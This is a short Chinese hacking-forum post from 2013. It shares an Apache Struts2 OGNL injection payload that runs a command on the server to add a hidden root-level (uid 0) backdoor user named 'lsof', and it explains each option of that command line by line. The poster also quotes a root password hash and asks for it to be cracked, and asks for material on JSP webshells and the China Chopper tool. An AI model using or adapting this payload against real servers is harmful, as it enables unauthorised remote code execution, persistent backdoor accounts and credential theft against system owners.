本帖最后由 xyhacker 于 2013-12-12 01:05 编辑
[AppleScript] 查看源码 复制代码 ?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'useradd','-p','`openssl','passwd','-1','-salt','lsof','admin`','-u','0','-o','-g','root','-G','root','-s','/bin/bash','-d','/usr/bin/lsof','lsof'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpervletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
Struts漏洞
[AppleScript] 查看源码 复制代码 {'useradd','-p','`openssl','passwd','-1','-salt','lsof','admin`','-u','0','-o','-g','root','-G','root','-s','/bin/bash','-d','/usr/bin/lsof','lsof'}
这段为命令执行
[AppleScript] 查看源码 复制代码 useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof
命令解释
useradd 添加用户
-p `openssl passwd -1 -salt 'lsof' admin` 这个里面的指的是设置用户的密码,里面的lsof差不多是密钥之类的,可以随便写, admin是明文密码
-u 0 -o 添加一个uid为 0的用户 就相对于root级别的了
-g root -G root 将用户添加到root组
-s /bin/bash 指定新建用户的shell路径
-d /usr/bin/lsof 新建用户的主目录,可以自己定义
lsof 新建的用户的用户名
如果执行察看一个文件那么就是
[AppleScript] 查看源码 复制代码 'cat', '/etc/passwd'
,那么直接添加一个用户讷? 求各为大大构造下,不会构造
另外
[AppleScript] 查看源码 复制代码 root:$1$j/hv8gkb$p2R4pZgXGu8O0sd3CR56Q0:
求解密
jsp 大马不解析,听说有菜刀, 求这方面的资料
| 
发表于 2013-12-12 01:02:20
发表于 2013-12-12 09:23:20
